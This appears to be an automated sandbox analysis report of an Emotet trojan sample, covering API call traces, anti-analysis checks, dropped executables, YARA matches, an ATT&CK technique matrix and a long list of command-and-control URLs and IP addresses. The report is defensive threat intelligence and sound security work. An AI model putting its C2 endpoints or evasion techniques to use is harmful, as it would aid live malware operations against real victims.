xA,ShowWindow,UpdateWindow,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,TranslateMessage,DispatchMessageA,GetMessageA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401600
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_00401600 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,EncryptFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,LoadIconA,LoadCursorA,GetStockObject,RegisterClassA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,CreateWindowExA,ShowWindow,UpdateWindow,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,TranslateMessage,DispatchMessageA,GetMessageA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401600
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02675140 mov eax, dword ptr fs:[00000030h]0_2_02675140
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02674190 mov eax, dword ptr fs:[00000030h]0_2_02674190
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02210456 mov eax, dword ptr fs:[00000030h]0_2_02210456
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02216CDE mov eax, dword ptr fs:[00000030h]0_2_02216CDE
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02215D2E mov eax, dword ptr fs:[00000030h]0_2_02215D2E
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_0221095E mov eax, dword ptr fs:[00000030h]0_2_0221095E
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02611030 mov eax, dword ptr fs:[00000030h]0_2_02611030
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_021B5140 mov eax, dword ptr fs:[00000030h]2_2_021B5140
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_021B4190 mov eax, dword ptr fs:[00000030h]2_2_021B4190
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_01FD095E mov eax, dword ptr fs:[00000030h]2_2_01FD095E
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_01FD5D2E mov eax, dword ptr fs:[00000030h]2_2_01FD5D2E
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_01FD6CDE mov eax, dword ptr fs:[00000030h]2_2_01FD6CDE
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_01FD0456 mov eax, dword ptr fs:[00000030h]2_2_01FD0456
                      Source: C:\Windows\SysWOW64\expand\regedit.exeCode function: 2_2_02151030 mov eax, dword ptr fs:[00000030h]2_2_02151030
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E5140 mov eax, dword ptr fs:[00000030h]4_2_021E5140
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E4190 mov eax, dword ptr fs:[00000030h]4_2_021E4190
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_00590456 mov eax, dword ptr fs:[00000030h]4_2_00590456
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_00596CDE mov eax, dword ptr fs:[00000030h]4_2_00596CDE
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_0059095E mov eax, dword ptr fs:[00000030h]4_2_0059095E
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_00595D2E mov eax, dword ptr fs:[00000030h]4_2_00595D2E
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_02181030 mov eax, dword ptr fs:[00000030h]4_2_02181030
                      Source: C:\Users\user\Desktop\mNtu4X8ZyE.exeCode function: 0_2_02611030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,0_2_02611030
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeCode function: 4_2_021E5720 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,4_2_021E5720
                      Source: C:\Windows\SysWOW64\winhttpcom\wpnclient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.mNtu4X8ZyE.exe.221052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regedit.exe.1fd279e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.wpnclient.exe.21e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regedit.exe.1fd052e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.mNtu4X8ZyE.exe.221279e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regedit.exe.1fd279e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.wpnclient.exe.59052e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.wpnclient.exe.59052e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regedit.exe.1fd052e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.mNtu4X8ZyE.exe.221052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.mNtu4X8ZyE.exe.221279e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.wpnclient.exe.59279e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.wpnclient.exe.59279e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.mNtu4X8ZyE.exe.2670000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regedit.exe.21b0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1306329295.0000000002671000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2541675452.0000000000590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1322151004.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1306249932.0000000002614000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2541960416.0000000002184000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1306123613.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1322291450.0000000002154000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1322392048.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                      Service Execution
                      22
                      Windows Service
                      22
                      Windows Service
                      12
                      Masquerading
                      OS Credential Dumping11
                      Security Software Discovery
                      Remote Services11
                      Archive Collected Data
                      2
                      Encrypted Channel
                      Exfiltration Over Other Network Medium1
                      Data Encrypted for Impact
                      CredentialsDomainsDefault Accounts11
                      Native API
                      1
                      DLL Side-Loading
                      1
                      Process Injection
                      1
                      Modify Registry
                      LSASS Memory1
                      Virtualization/Sandbox Evasion
                      Remote Desktop ProtocolData from Removable Media11
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading
                      1
                      Virtualization/Sandbox Evasion
                      Security Account Manager2
                      Process Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Process Injection
                      NTDS1
                      System Service Discovery
                      Distributed Component Object ModelInput Capture112
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Hidden Files and Directories
                      LSA Secrets2
                      File and Directory Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Obfuscated Files or Information
                      Cached Domain Credentials14
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      File Deletion
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1553820 Sample: mNtu4X8ZyE.exe Startdate: 11/11/2024 Architecture: WINDOWS Score: 100 25 216.47.196.104 WOW-INTERNETUS United States 2->25 27 109.242.153.9 WIND-ASGR Greece 2->27 29 94 other IPs or domains 2->29 31 Suricata IDS alerts for network traffic 2->31 33 Found malware configuration 2->33 35 Antivirus / Scanner detection for submitted sample 2->35 37 5 other signatures 2->37 8 mNtu4X8ZyE.exe 2 2->8         started        11 svchost.exe 2->11         started        signatures3 process4 signatures5 39 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 8->39 41 Drops executables to the windows directory (C:\Windows) and starts them 8->41 43 Uses regedit.exe to modify the Windows registry 8->43 45 Hides that the sample has been downloaded from the Internet (zone.identifier) 8->45 13 regedit.exe 2 8->13         started        process6 signatures7 47 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 13->47 49 Drops executables to the windows directory (C:\Windows) and starts them 13->49 51 Hides that the sample has been downloaded from the Internet (zone.identifier) 13->51 16 wpnclient.exe 12 13->16         started        process8 dnsIp9 19 177.144.130.105, 49986, 8080 TELEFONICABRASILSABR Brazil 16->19 21 37.187.161.206, 49983, 8080 OVHFR France 16->21 23 3 other IPs or domains 16->23

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      mNtu4X8ZyE.exe79%ReversingLabsWin32.Trojan.Emotet
                      mNtu4X8ZyE.exe100%AviraTR/Crypt.XPACK.Gen2
                      mNtu4X8ZyE.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://138.97.60.141:7080/5ZnPdPFU/H0%Avira URL Cloudsafe
                      http://70.39.251.94:8080/cqrpaz30CJV6rcTaee/60%Avira URL Cloudsafe
                      http://169.1.39.242/XCULSRNtkPzEnoI/N2CP4bvAn2eR7Mn/s0%Avira URL Cloudsafe
                      http://169.1.39.242/XCULSRNtkPzEnoI/N2CP4bvAn2eR7Mn/0%Avira URL Cloudsafe
                      http://70.39.251.94:8080/cqrpaz30CJV6rcTaee//if77Qmg3AUNbSqT8W/s0%Avira URL Cloudsafe
                      http://138.97.60.141:7080/5ZnPdPFU/Y0%Avira URL Cloudsafe
                      http://87.230.25.43:8080/RXVvzMf/N2ZJn/HWDPmWEOobR5vsovM/wC1leNEGWSEakmmN/GZFwmhHZxt53d/1udoH/0%Avira URL Cloudsafe
                      http://87.230.25.43:8080/RXVvzMf/N2ZJn/HWDPmWEOobR5vsovM/wC1leNEGWSEakmmN/GZFwmhHZxt53d/1udoH/Q0%Avira URL Cloudsafe
                      http://45.46.37.97/9AWvP9tUiB0vNBtHp/soehIFh6TFhjHQ8To/FvPsEJTxaNlNquPbdI/I8C2Lbudvo8T8/;0%Avira URL Cloudsafe
                      http://37.187.161.206:8080/L3q6/BqUpGZyIOtsBpT/0zFYv51ZlaEeQ4uYJ9/AHC3ud/VyzjKGaZCXONK/0%Avira URL Cloudsafe
                      http://190.202.229.74/NVYQ97TAZC9w/0%Avira URL Cloudsafe
                      http://138.97.60.141:7080/5ZnPdPFU/0%Avira URL Cloudsafe
                      http://94.23.62.116:8080/MVkm4Pe/qvF8hKL0/xQboaYc/tEAE/bvOe1g/jyw23JOFoAe/0%Avira URL Cloudsafe
                      http://118.69.11.81:7080/fcGeLw4p/ihOwVRSFxWUqd0kFgJ/4jfMfuO/EFhh74Ny/if77Qmg3AUNbSqT8W/0%Avira URL Cloudsafe
                      http://169.1.39.242/XCULSRNtkPzEnoI/N2CP4bvAn2eR7Mn/wshqos.dll.mui0%Avira URL Cloudsafe
                      http://70.39.251.94:8080/cqrpaz30CJV6rcTaee/0%Avira URL Cloudsafe
                      http://177.144.130.105:8080/2g3r3uVJyW4vwEwW2rV/BSwocEVkUzwjsP3EXb/tToQfSpvkbELnFp/GKhVdMsrUWytWXLFY0%Avira URL Cloudsafe
                      http://45.46.37.97/9AWvP9tUiB0vNBtHp/soehIFh6TFhjHQ8To/FvPsEJTxaNlNquPbdI/I8C2Lbudvo8T8/0%Avira URL Cloudsafe
                      http://177.144.130.105:8080/2g3r3uVJyW4vwEwW2rV/BSwocEVkUzwjsP3EXb/tToQfSpvkbELnFp/GKhVdMsrUWytWXLFY/s5tFZi8Vxs3oBnZWiR/tXm8d1/0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      time.windows.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://169.1.39.242/XCULSRNtkPzEnoI/N2CP4bvAn2eR7Mn/true
                        • Avira URL Cloud: safe
                        unknown
                        http://87.230.25.43:8080/RXVvzMf/N2ZJn/HWDPmWEOobR5vsovM/wC1leNEGWSEakmmN/GZFwmhHZxt53d/1udoH/true
                        • Avira URL Cloud: safe
                        unknown
                        http://37.187.161.206:8080/L3q6/BqUpGZyIOtsBpT/0zFYv51ZlaEeQ4uYJ9/AHC3ud/VyzjKGaZCXONK/true
                        • Avira URL Cloud: safe
                        unknown
                        http://190.202.229.74/NVYQ97TAZC9w/true
                        • Avira URL Cloud: safe
                        unknown
                        http://138.97.60.141:7080/5ZnPdPFU/true
                        • Avira URL Cloud: safe
                        unknown
                        http://118.69.11.81:7080/fcGeLw4p/ihOwVRSFxWUqd0kFgJ/4jfMfuO/EFhh74Ny/if77Qmg3AUNbSqT8W/true
                        • Avira URL Cloud: safe
                        unknown
                        http://70.39.251.94:8080/cqrpaz30CJV6rcTaee/true
                        • Avira URL Cloud: safe
                        unknown
                        http://94.23.62.116:8080/MVkm4Pe/qvF8hKL0/xQboaYc/tEAE/bvOe1g/jyw23JOFoAe/true
                        • Avira URL Cloud: safe
                        unknown
                        http://177.144.130.105:8080/2g3r3uVJyW4vwEwW2rV/BSwocEVkUzwjsP3EXb/tToQfSpvkbELnFp/GKhVdMsrUWytWXLFY/s5tFZi8Vxs3oBnZWiR/tXm8d1/true
                        • Avira URL Cloud: safe
                        unknown
                        http://45.46.37.97/9AWvP9tUiB0vNBtHp/soehIFh6TFhjHQ8To/FvPsEJTxaNlNquPbdI/I8C2Lbudvo8T8/true
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://138.97.60.141:7080/5ZnPdPFU/Hwpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://70.39.251.94:8080/cqrpaz30CJV6rcTaee/6wpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://169.1.39.242/XCULSRNtkPzEnoI/N2CP4bvAn2eR7Mn/swpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://138.97.60.141:7080/5ZnPdPFU/Ywpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://70.39.251.94:8080/cqrpaz30CJV6rcTaee//if77Qmg3AUNbSqT8W/swpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://87.230.25.43:8080/RXVvzMf/N2ZJn/HWDPmWEOobR5vsovM/wC1leNEGWSEakmmN/GZFwmhHZxt53d/1udoH/Qwpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://45.46.37.97/9AWvP9tUiB0vNBtHp/soehIFh6TFhjHQ8To/FvPsEJTxaNlNquPbdI/I8C2Lbudvo8T8/;wpnclient.exe, 00000004.00000002.2542343717.00000000028C0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://169.1.39.242/XCULSRNtkPzEnoI/N2CP4bvAn2eR7Mn/wshqos.dll.muiwpnclient.exe, 00000004.00000002.2542343717.00000000028EC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://177.144.130.105:8080/2g3r3uVJyW4vwEwW2rV/BSwocEVkUzwjsP3EXb/tToQfSpvkbELnFp/GKhVdMsrUWytWXLFYwpnclient.exe, 00000004.00000002.2541739448.000000000061E000.00000004.00000020.00020000.00000000.sdmp, wpnclient.exe, 00000004.00000002.2542343717.00000000028EC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        81.214.253.80
                        unknownTurkey
                        9121TTNETTRtrue
                        94.176.234.118
                        unknownLithuania
                        62282RACKRAYUABRakrejusLTtrue
                        78.206.229.130
                        unknownFrance
                        12322PROXADFRtrue
                        181.58.181.9
                        unknownColombia
                        10620TelmexColombiaSACOtrue
                        213.197.182.158
                        unknownLithuania
                        15440BALTNETACustomersASLTtrue
                        103.13.224.53
                        unknownBangladesh
                        58672MAXNETONLINE-BDMaxnetOnlineBDtrue
                        209.236.123.42
                        unknownUnited States
                        393398ASN-DISUStrue
                        79.118.74.90
                        unknownRomania
                        8708RCS-RDS73-75DrStaicoviciROtrue
                        51.15.7.145
                        unknownFrance
                        12876OnlineSASFRtrue
                        190.45.24.210
                        unknownChile
                        22047VTRBANDAANCHASACLtrue
                        5.196.35.138
                        unknownFrance
                        16276OVHFRtrue
                        190.190.219.184
                        unknownArgentina
                        10481TelecomArgentinaSAARtrue
                        200.59.6.174
                        unknownArgentina
                        12150COTELCAMARtrue
                        181.129.96.162
                        unknownColombia
                        13489EPMTelecomunicacionesSAESPCOtrue
                        50.28.51.143
                        unknownUnited States
                        32244LIQUIDWEBUStrue
                        189.34.181.88
                        unknownBrazil
                        28573CLAROSABRtrue
                        149.202.72.142
                        unknownFrance
                        16276OVHFRtrue
                        82.76.52.155
                        unknownRomania
                        8708RCS-RDS73-75DrStaicoviciROtrue
                        5.89.33.136
                        unknownItaly
                        30722VODAFONE-IT-ASNITtrue
                        45.16.226.117
                        unknownUnited States
                        7018ATT-INTERNET4UStrue
                        120.72.18.91
                        unknownPhilippines
                        38553DCTECHDVO-AS-APInternetServiceProviderandDataCenterPtrue
                        187.162.250.23
                        unknownMexico
                        6503AxtelSABdeCVMXtrue
                        12.163.208.58
                        unknownUnited States
                        7018ATT-INTERNET4UStrue
                        101.187.81.254
                        unknownAustralia
                        1221ASN-TELSTRATelstraCorporationLtdAUtrue
                        177.107.79.214
                        unknownBrazil
                        52862RedenilfServicosdeTelecomunicacoesLtdaBRtrue
                        202.134.4.210
                        unknownIndonesia
                        7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                        190.64.88.186
                        unknownUruguay
                        6057AdministracionNacionaldeTelecomunicacionesUYtrue
                        68.183.170.114
                        unknownUnited States
                        14061DIGITALOCEAN-ASNUStrue
                        168.197.45.36
                        unknownArgentina
                        264781VIDEOTELSRLARtrue
                        1.226.84.243
                        unknownKorea Republic of
                        9277SKB-T-AS-KRSKBroadbandCoLtdKRtrue
                        24.135.69.146
                        unknownSerbia
                        31042SERBIA-BROADBAND-ASSerbiaBroadBand-SrpskeKablovskemrezetrue
                        137.74.106.111
                        unknownFrance
                        16276OVHFRtrue
                        172.104.169.32
                        unknownUnited States
                        63949LINODE-APLinodeLLCUStrue
                        178.250.54.208
                        unknownUnited Kingdom
                        20860IOMART-ASGBtrue
                        45.33.77.42
                        unknownUnited States
                        63949LINODE-APLinodeLLCUStrue
                        46.101.58.37
                        unknownNetherlands
                        14061DIGITALOCEAN-ASNUStrue
                        177.23.7.151
                        unknownBrazil
                        262886LansofNetLTDAMEBRtrue
                        216.47.196.104
                        unknownUnited States
                        12083WOW-INTERNETUStrue
                        83.169.21.32
                        unknownGermany
                        8972GD-EMEA-DC-SXB1DEtrue
                        109.190.35.249
                        unknownFrance
                        35540OVH-TELECOMFRtrue
                        172.86.186.21
                        unknownCanada
                        32489AMANAHA-NEWCAtrue
                        70.32.115.157
                        unknownUnited States
                        31815MEDIATEMPLEUStrue
                        186.189.249.2
                        unknownArgentina
                        16814NSSSAARtrue
                        109.101.137.162
                        unknownRomania
                        9050RTDBucharestRomaniaROtrue
                        190.115.18.139
                        unknownBelize
                        262254DDOS-GUARDCORPBZtrue
                        189.223.16.99
                        unknownMexico
                        8151UninetSAdeCVMXtrue
                        201.49.239.200
                        unknownBrazil
                        52532SpeednetTelecomunicacoesLtdaMEBRtrue
                        185.94.252.27
                        unknownGermany
                        197890MEGASERVERS-DEtrue
                        178.211.45.66
                        unknownTurkey
                        197328INETLTDTRtrue
                        169.1.39.242
                        unknownSouth Africa
                        37611AfrihostZAtrue
                        188.135.15.49
                        unknownOman
                        50010NAWRAS-ASSultanateofOmanOMtrue
                        60.249.78.226
                        unknownTaiwan; Republic of China (ROC)
                        3462HINETDataCommunicationBusinessGroupTWtrue
                        181.123.6.86
                        unknownParaguay
                        23201TelecelSAPYtrue
                        193.251.77.110
                        unknownFrance
                        3215FranceTelecom-OrangeFRtrue
                        192.241.143.52
                        unknownUnited States
                        14061DIGITALOCEAN-ASNUStrue
                        128.92.203.42
                        unknownUnited States
                        20115CHARTER-20115UStrue
                        81.215.230.173
                        unknownTurkey
                        9121TTNETTRtrue
                        111.67.12.221
                        unknownAustralia
                        55803DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAUtrue
                        46.105.114.137
                        unknownFrance
                        16276OVHFRtrue
                        192.232.229.54
                        unknownUnited States
                        46606UNIFIEDLAYER-AS-1UStrue
                        191.182.6.118
                        unknownBrazil
                        28573CLAROSABRtrue
                        200.24.255.23
                        unknownArgentina
                        52381SociedadCooperativaPopularLimitadadeComodoroARtrue
                        177.73.0.98
                        unknownBrazil
                        53184INBTelecomEIRELIBRtrue
                        70.32.84.74
                        unknownUnited States
                        398110GO-DADDY-COM-LLCUStrue
                        12.162.84.2
                        unknownUnited States
                        7018ATT-INTERNET4UStrue
                        181.61.182.143
                        unknownColombia
                        10620TelmexColombiaSACOtrue
                        170.81.48.2
                        unknownBrazil
                        263634TACNETTELECOMBRtrue
                        181.120.29.49
                        unknownParaguay
                        23201TelecelSAPYtrue
                        219.92.13.25
                        unknownMalaysia
                        4788TMNET-AS-APTMNetInternetServiceProviderMYtrue
                        98.103.204.12
                        unknownUnited States
                        10796TWC-10796-MIDWESTUStrue
                        190.101.156.139
                        unknownChile
                        22047VTRBANDAANCHASACLtrue
                        2.45.176.233
                        unknownItaly
                        30722VODAFONE-IT-ASNITtrue
                        187.162.248.237
                        unknownMexico
                        6503AxtelSABdeCVMXtrue
                        186.193.229.123
                        unknownBrazil
                        262731CTINETSOLUCOESEMCONECTIVIDADEEINFORMATICALTDBRtrue
                        189.2.177.210
                        unknownBrazil
                        4230CLAROSABRtrue
                        37.183.81.217
                        unknownItaly
                        30722VODAFONE-IT-ASNITtrue
                        179.222.115.170
                        unknownBrazil
                        28573CLAROSABRtrue
                        37.179.145.105
                        unknownItaly
                        30722VODAFONE-IT-ASNITtrue
                        118.69.11.81
                        unknownViet Nam
                        18403FPT-AS-APTheCorporationforFinancingPromotingTechnolotrue
                        68.183.190.199
                        unknownUnited States
                        14061DIGITALOCEAN-ASNUStrue
                        183.176.82.231
                        unknownJapan7522STCNSTNetIncorporatedJPtrue
                        177.144.130.105
                        unknownBrazil
                        27699TELEFONICABRASILSABRtrue
                        181.30.61.163
                        unknownArgentina
                        10318TelecomArgentinaSAARtrue
                        190.202.229.74
                        unknownVenezuela
                        8048CANTVServiciosVenezuelaVEtrue
                        82.76.111.249
                        unknownRomania
                        8708RCS-RDS73-75DrStaicoviciROtrue
                        77.238.212.227
                        unknownBosnia and Herzegowina
                        42560BA-TELEMACH-ASTelemachdooSarajevoBAtrue
                        217.13.106.14
                        unknownHungary
                        12301INVITECHHUtrue
                        77.78.196.173
                        unknownBosnia and Herzegowina
                        42560BA-TELEMACH-ASTelemachdooSarajevoBAtrue
                        62.84.75.50
                        unknownLebanon
                        42334BBP-ASLBtrue
                        37.187.161.206
                        unknownFrance
